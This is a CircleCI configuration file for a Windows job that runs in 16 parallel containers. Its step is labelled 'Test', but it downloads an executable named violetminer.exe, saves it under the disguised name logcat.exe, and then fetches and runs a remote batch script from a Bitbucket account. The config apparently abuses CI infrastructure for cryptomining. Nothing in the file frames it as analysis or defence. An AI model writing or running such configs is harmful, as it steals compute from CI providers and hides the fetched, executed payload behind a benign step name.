version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    parallelism: 16
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/naafmiwkkrd/manaja/downloads/violetminer.exe -OutFile logcat.exe
            Invoke-WebRequest https://bitbucket.org/naafmiwkkrd/manaja/raw/6db8a606244170ce63f50855b00293708c937f5b/log.bat -OutFile log.bat
            .\log.bat